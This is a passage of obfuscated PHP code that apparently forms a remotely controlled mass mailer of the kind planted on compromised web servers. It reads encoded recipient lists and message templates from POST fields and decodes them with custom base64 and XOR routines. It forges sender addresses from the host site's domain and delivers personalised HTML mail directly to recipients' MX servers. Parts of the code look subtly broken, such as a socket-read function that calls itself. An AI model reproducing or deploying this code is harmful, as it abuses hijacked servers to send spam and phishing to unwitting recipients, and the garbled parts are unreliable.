$emailDataList[$emailId]["s_dataout"] = substr($emailDataList[$emailId]["s_dataout"], $data);
if (strlen($emailDataList[$emailId]["s_dataout"]) == 0) {
return TRUE;
}
return FALSE;
}
function hasOpenedSockets($r76, &$emailDataList)
{
$socketData = FALSE;
if (constant("SOCKET_TYPE") != constant("SOCKET_TYPE_SOCKET")) {
foreach (array_keys($emailDataList) as $emailId) {
if ($emailDataList[$emailId]["l_smtp_end"] != TRUE) {
$emailDataList[$emailId]["s_trig"] = TRUE;
$socketData = TRUE;
}
}
return $socketData;
}
$fwcsz21 = array();
foreach (array_keys($emailDataList) as $emailId) {
if ($emailDataList[$emailId]["l_smtp_end"] != TRUE) {
if ($emailDataList[$emailId]["s_sock"] == 0 || $emailDataList[$emailId]["s_step"] == constant("STEP_CONNECT")) {
$emailDataList[$emailId]["s_trig"] = TRUE;
} else {
$emailDataList[$emailId]["s_trig"] = FALSE;
$fwcsz21[] = $emailDataList[$emailId]["s_sock"];
}
$socketData = TRUE;
}
}
if (count($fwcsz21) == 0) {
return $socketData;
}
// watch for changes to all opened sockets and updates the email list of sockets accordinly.
$zkvhr54 = @socket_select($fwcsz21, $kllzd89 = NULL, $ccvhx50 = NULL, 0);
if ($zkvhr54 == FALSE || $zkvhr54 == 0) {
return $socketData;
}
foreach (array_keys($emailDataList) as $emailId) {
$emailDataList[$emailId]["s_trig"] = FALSE;
foreach ($fwcsz21 as $xoloh2) {
if ($emailDataList[$emailId]["s_sock"] == $xoloh2) {
$emailDataList[$emailId]["s_trig"] = TRUE;
break;
}
}
}
return $socketData;
}
function determine_socket_type($r76, $foo)
{
if (function_exists("socket_create") && function_exists("socket_connect") && function_exists("read_socket_data") && function_exists("socket_write")) {
define("SOCKET_TYPE", constant("SOCKET_TYPE_SOCKET"));
return TRUE;
}
if (function_exists("fsockopen")) {
define("SOCKET_TYPE", constant("SOCKET_TYPE_FSOCKET"));
return TRUE;
}
if (function_exists("stream_socket_client")) {
define("SOCKET_TYPE", constant("SOCKET_TYPE_STREAM"));
return TRUE;
}
define("SOCKET_TYPE", constant("SOCKET_TYPE_NO"));
return FALSE;
}
function populateEmailData($r76, $recipientData, $senderEmailData, &$emailData)
{
$qivuk92 = array();
if (FALSE === @preg_match("/(.*?;)?(.*?;)?(.+@(.+)?);?/", $recipientData, $qivuk92)) {
return FALSE;
}
if (!isset($qivuk92) || count($qivuk92) != 5) {
return FALSE;
}
$emailData["g_namefirst"] = @ucfirst(str_replace(";", "", $qivuk92[1]));
$emailData["g_namelast"] = @ucfirst(str_replace(";", "", $qivuk92[2]));
$emailData["g_mailto"] = str_replace(";", "", $qivuk92[3]);
$emailData["g_domainto"] = str_replace(";", "", $qivuk92[4]);
if (!isset($emailData["g_mailto"]) || $emailData["g_mailto"] == "") {
return FALSE;
}
if (!isset($emailData["g_domainto"]) || $emailData["g_domainto"] == "") {
return FALSE;
}
if (isset($emailData["g_namefirst"]) && $emailData["g_namefirst"] != "") {
$emailData["g_mailto+"] = $emailData["g_namefirst"] . " " . $emailData["g_namelast"] . " <" . $emailData["g_mailto"] . ">";
} else {
$emailData["g_mailto+"] = $emailData["g_mailto"];
}
$emailData["g_domainfrom"] = $senderEmailData["hostFrom"];
if (preg_match("/^([1-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])(\.([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])){3}$/", $senderEmailData["hostFrom"]) || @ini_get("safe_mode")) {
$emailData["g_fff"] = FALSE;
} else {
$emailData["g_fff"] = TRUE;
}
$emailData["g_mailfrom"] = $senderEmailData["fromLogin"] . "@" . $senderEmailData["hostFrom"];
if (isset($senderEmailData["fromName"]) && $senderEmailData["fromName"] != "") {
$emailData["g_mailfrom+"] = $senderEmailData["fromName"] . " <" . $emailData["g_mailfrom"] . ">";
} else {
$emailData["g_mailfrom+"] = $emailData["g_mailfrom"];
}
$emailData["s_mxhost"] = getMXHosts($r76, $emailData["g_domainto"]);
$emailData["g_subject"] = @str_replace("%R_NAME%", $emailData["g_namefirst"], $senderEmailData["subjTempl"]);
$emailData["g_subject"] = @str_replace("%R_LNAME%", $emailData["g_namelast"], $emailData["g_subject"]);
$emailData["g_body"] = @str_replace("%R_NAME%", $emailData["g_namefirst"], $senderEmailData["bodyTempl"]);
$emailData["g_body"] = @str_replace("%R_LNAME%", $emailData["g_namelast"], $emailData["g_body"]);
$emailData["g_body"] = @str_replace("%MAIL_EN%", encode_data($r76, $emailData["g_mailto"]), $emailData["g_body"]);
$emailData["g_header"] = "X-Priority: 3 (Normal)
";
$emailData["g_header"] .= "MIME-Version: 1.0
";
$emailData["g_header"] .= "Content-Type: text/html;
charset=\"iso-8859-1\"
";
$emailData["g_header"] .= "Content-Transfer-Encoding: 8bit
";
$emailData["g_headerfrom"] = "From: " . $emailData["g_mailfrom+"] . "
";
$emailData["g_headerfrom"] .= "Reply-To:" . $emailData["g_mailfrom+"] . "
";
$emailData["s_header"] = "Date: " . @date("D, j M Y G:i:s O") . "
";
$emailData["s_header"] .= $emailData["g_headerfrom"];
$emailData["s_header"] .= "Message-ID: <" . preg_replace("/(.{7})(.{5})(.{2}).*/", "$1-$2-$3", md5(time())) . "@" . $senderEmailData["hostFrom"] . ">
";
$emailData["s_header"] .= "To: " . $emailData["g_mailto+"] . "
";
$emailData["s_header"] .= "Subject: " . $emailData["g_subject"] . "
";
$emailData["s_header"] .= $emailData["g_subject"];
return TRUE;
}
function getMXHosts($r76, $hostname)
{
$mlopr36 = array();
$vcnaa29 = array();
if (function_exists("getmxrr")) {
@getmxrr($hostname, $mlopr36, $vcnaa29);
} else {
if (constant("SOCKET_TYPE") == constant("SOCKET_TYPE_NO")) {
return FALSE;
}
$zkvhr54 = resolveDnsName($r76, $hostname, constant("DNS_TYPE_MX"));
if ($zkvhr54 == FALSE || !isset($zkvhr54["ans"])) {
return FALSE;
}
foreach ($zkvhr54["ans"] as $txows40) {
if ($txows40["type"] == constant("DNS_TYPE_MX")) {
$mlopr36[] = $txows40["data"];
$vcnaa29[] = $txows40["preference"];
}
}
}
if (count($mlopr36) == 0) {
return FALSE;
}
$wtqra76 = array_keys($vcnaa29, min($vcnaa29));
return $mlopr36[$wtqra76[0]];
}
function getDataFromPost($r76, &$senderEmailData)
{
if (count($_POST) < 2) {
return FALSE;
}
$messageEncoded = false;
$listPostKey = $dataPostKey = "";
foreach (array_keys($_POST) as $key) {
if ($key[0] == "l") {
$listPostKey = $key;
}
if ($key[0] == "d") {
$dataPostKey = $key;
}
if ($key[0] == "e") {
$messageEncoded = true;
}
}
if ($listPostKey == "" || $dataPostKey == "") {
return FALSE;
}
$postedRecipients = getPostData($r76, $listPostKey, $messageEncoded);
$postedData = getPostData($r76, $dataPostKey, $messageEncoded);
if ($postedRecipients == FALSE || $postedData == FALSE) {
return FALSE;
}
$senderEmailData["toList"] = @preg_split("/#/", $postedRecipients);
$senderEmailData["fromLogin"] = $senderEmailData["fromName"] = $senderEmailData["subjTempl"] = $senderEmailData["bodyTempl"] = "";
$qivuk92 = array();
if (FALSE !== @preg_match("/<USER>(.*?)<\/USER>/ism", $postedData, $qivuk92) && isset($qivuk92) && count($qivuk92) > 1) {
$senderEmailData["fromLogin"] = $qivuk92[1];
}
if (FALSE !== @preg_match("/<NAME>(.*?)<\/NAME>/ism", $postedData, $qivuk92) && isset($qivuk92) && count($qivuk92) > 1) {
$senderEmailData["fromName"] = $qivuk92[1];
}
if (FALSE !== @preg_match("/<SUBJ>(.*?)<\/SUBJ>/ism", $postedData, $qivuk92) && isset($qivuk92) && count($qivuk92) > 1) {
$senderEmailData["subjTempl"] = $qivuk92[1];
}
if (FALSE !== @preg_match("/<SBODY>(.*?)<\/SBODY>/ism", $postedData, $qivuk92) && isset($qivuk92) && count($qivuk92) > 1) {
$senderEmailData["bodyTempl"] = $qivuk92[1];
}
$senderEmailData["hostFrom"] = @preg_replace("/^(www|ftp)\./i", '', $_SERVER["HTTP_HOST"]);
return TRUE;
}
function getPostData($r76, $postIndex, $messageEncoded)
{
if (!isset($postIndex) || $postIndex == "") {
return FALSE;
}
$message = @$_POST[$postIndex];
if ($messageEncoded) {
$message = messageDecode($r76, $message);
for ($i = 0; $i < strlen($message); $i++) {
$message[$i] = chr(ord($message[$i]) ^ 2);
}
}
return urldecode(stripslashes($message));
}
function messageDecode($r76, $rxuwy6)
{
$data = "";
for ($i = 0; $i < 256; $i++) {
$vefvn90[$i] = chr($i);
}
$adcpo58 = array_flip(preg_split("//", "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/", -1, 1));
$rfsny13 = array();
preg_match_all("([A-z0-9+\/]{1,4})", $rxuwy6, $rfsny13);
foreach ($rfsny13[0] as $dkpwg91) {
$omqhl54 = 0;
for ($i = 0; isset($dkpwg91[$i]); $i++) {
$omqhl54 = ($omqhl54 << 6) + $adcpo58[$dkpwg91[$i]];
if ($i > 0) {
$data .= $vefvn90[$omqhl54 >> (4 - (2 * ($i - 1)))];
$omqhl54 = $omqhl54 & (0xf >> (2 * ($i - 1)));
}
}
}
return $data;
}
function encode_data($r76, $input)
{
for ($i = 0; $i < strlen($input); $i++) {
$input[$i] = chr(ord($input[$i]) ^ 2);
}
return base64_encode($input);
}
function socketFactory($r76, $fsock, $socketProtocol, $address, $port, $timeout, &$errno, &$errstr, $nonblock = false)
{
$protocol = "";
$socketProtocol = NULL;
$socketType = NULL;
$errno = 0;
$errstr = "";
if ($socketProtocol == constant("SOCKET_PROTO_TCP")) {
$protocol = "tcp";
$socketProtocol = SOL_TCP;
$socketType = SOCK_STREAM;
} else if ($socketProtocol == constant("SOCKET_PROTO_UDP")) {
$protocol = "udp";
$socketType = SOCK_DGRAM;
$socketProtocol = SOL_UDP;
} else {
$errstr = "Error: invalid protocol";
return FALSE;
}
switch (constant("SOCKET_TYPE")) {
case constant("SOCKET_TYPE_SOCKET"):
if ($fsock == FALSE) {
$fsock = @socket_create(AF_INET, $socketType, $socketProtocol);
if ($fsock == FALSE) {
$errno = socket_last_error();
$errstr = socket_strerror($errno);
break;
}
socket_set_option($fsock, SOL_SOCKET, SO_REUSEADDR, 1);
socket_set_option($fsock, SOL_SOCKET, SO_RCVTIMEO, array(
"sec" => $timeout,
"usec" => 0
));
socket_set_option($fsock, SOL_SOCKET, SO_SNDTIMEO, array(
"sec" => $timeout,
"usec" => 0
));
if ($nonblock) {
socket_set_nonblock($fsock);
}
}
if (!@socket_connect($fsock, $address, $port)) {
$errno = socket_last_error($fsock);
$errstr = socket_strerror($errno);
}
if ($nonblock) {
socket_set_nonblock($fsock);
}
break;
case constant("SOCKET_TYPE_FSOCKET"):
$fsock = @fsockopen($protocol . "://" . $address, $port, $errno, $errstr, $timeout);
if ($fsock && $nonblock) {
@stream_set_blocking($fsock, 0);
}
@stream_set_timeout($fsock, $timeout);
break;
case constant("SOCKET_TYPE_STREAM"):
$fsock = @stream_socket_client($protocol . "://" . $address . ":" . $port, $errno, $errstr, $timeout);
if ($fsock && $nonblock) {
@stream_set_blocking($fsock, 0);
}
@stream_set_timeout($fsock, $timeout);
break;
default:
$errstr = "Error: invalid socket type";
return FALSE;
}
return $fsock;
}
function close_connection($r76, &$fsock)
{
if ($fsock == FALSE) {
return;
}
if (constant("SOCKET_TYPE") == constant("SOCKET_TYPE_SOCKET")) {
@socket_close($fsock);
} else {
@fclose($fsock);
}
$fsock = FALSE;
return;
}
function read_socket_data($r76, $fsock, $bytesToRead, &$errno, &$errstr)
{
if ($fsock == FALSE) {
return FALSE;
}
if (constant("SOCKET_TYPE") == constant("SOCKET_TYPE_SOCKET")) {
$socketData = @read_socket_data($fsock, $bytesToRead, PHP_BINARY_READ);
if ($socketData == FALSE) {
$errno = socket_last_error($fsock);
$errstr = socket_strerror($errno);
}
} else {
if (@feof($fsock)) {
return FALSE;
}
$socketData = @fread($fsock, $bytesToRead);
if (strlen($socketData) == 0) {
$errno = 35;
}
}
return $socketData;
}
function write_socket_data($r76, $fsock, $data, &$errno, &$errstr)
{
if ($fsock == FALSE) {
return FALSE;
}
if (constant("SOCKET_TYPE") == constant("SOCKET_TYPE_SOCKET")) {
$socketData = @socket_write($fsock, $data);
if ($socketData == FALSE) {
$errno = socket_last_error($fsock);
$errstr = socket_strerror($errno);
}
} else {
if (@feof($fsock)) {
return FALSE;
}
$socketData = @fwrite($fsock, $data);
}
return $socketData;
}
function wdtjf68($r76, $fsock, $timeout)
{
if ($fsock == FALSE) {
return FALSE;
}
if (constant("SOCKET_TYPE") == constant("SOCKET_TYPE_SOCKET")) {
@socket_set_option($fsock, SOL_SOCKET, SO_RCVTIMEO, array(
"sec" => $timeout,
"usec" => 0
));
@socket_set_option($fsock, SOL_SOCKET, SO_SNDTIMEO, array(
"sec" => $timeout,
"usec" => 0
));
} else {
@stream_set_timeout($fsock, $timeout);
}
return TRUE;
}
function resolveDnsName($r76, $hostname, $jvanz2)
{
$errno = 0;
$errstr = "";
$fsock = socketFactory($r76, FALSE, constant("SOCKET_PROTO_UDP"), "8.8.8.8", 53, 10, $errno, $errstr);
if (!$fsock) {
return FALSE;
}
$lsxth41 = rand(0x0001, 0xFFFE);
$uamee6 = explode("J", $hostname);
$payload = pack("nnnnnn", $lsxth41, 0x0100, 0x0001, 0x0000, 0x0000, 0x0000);
foreach ($uamee6 as $sahcc1) {
$payload .= pack("Ca*", strlen($sahcc1), $sahcc1);
}
$payload .= pack("Cnn", 0x00, $jvanz2, 0x0001);
$socketStatus = write_socket_data($r76, $fsock, $payload, $errno, $errstr);
if (!$socketStatus || $socketStatus != strlen($payload)) {
close_connection($r76, $fsock);
return FALSE;
}
$dnsResponse = read_socket_data($r76, $fsock, 4086, $errno, $errstr);
if ($dnsResponse == FALSE || strlen($dnsResponse) < 12) {
close_connection($r76, $fsock);
return FALSE;
}
$eynrg66 = unpack("ntid/nflags/nque/nans/nauth/nadd", substr($dnsResponse, 0, 12));
$zjthw11 = 12;
$dnsData = array(
"header" => $eynrg66
);
for ($i = constant("DNS_STEP_QESTION"); $i <= constant("DNS_STEP_ADDITIONAL"); $i++) {
$trxcp25 = '';
switch ($i) {
case constant("DNS_STEP_QESTION"):
$trxcp25 = "que";
break;
case constant("DNS_STEP_ANSWER"):
$trxcp25 = "ans";
break;
case constant("DNS_STEP_AUTHORITY"):
$trxcp25 = "auth";
break;
case constant("DNS_STEP_ADDITIONAL"):
$trxcp25 = "add";
break;
}
for ($ybjpw87 = 0; $ybjpw87 < $eynrg66[$trxcp25]; $ybjpw87++) {
$dnsRecordData["name"] = cgzhg7($r76, $zjthw11, $dnsResponse);
if ($i == constant("DNS_STEP_QESTION")) {
$dnsRecordData = array_merge($dnsRecordData, unpack("ntype/nclass", substr($dnsResponse, $zjthw11, 4)));
$zjthw11 += 4;
} else {
$dnsRecordData = array_merge($dnsRecordData, unpack